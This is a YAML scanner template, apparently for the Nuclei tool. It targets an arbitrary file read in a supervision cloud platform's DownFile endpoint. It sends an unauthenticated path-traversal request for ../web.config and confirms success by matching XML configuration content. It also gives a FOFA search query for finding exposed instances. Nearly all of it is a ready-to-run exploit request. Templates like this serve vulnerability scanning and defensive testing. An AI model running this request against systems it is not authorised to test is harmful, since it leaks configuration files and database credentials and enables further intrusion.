http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <?xml version="1.0"
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Download/DownFile?fileName=../web.config HTTP/1.1
          Host: {{Hostname}}
id: zonghejianguanyun-DownFile-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="/Download/DownFile?fileName=SetUp.exe"
        综合监管云平台 DownFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 综合监管云平台 DownFile 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247485029&idx=1&sn=2065e33047ea4655b6771039aa3c352b&chksm=c267b356f5103a402d8b6c633071cf1a85a5a6cd7799b0805e91c19c06082a2024262f1fb581&token=1439003696&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
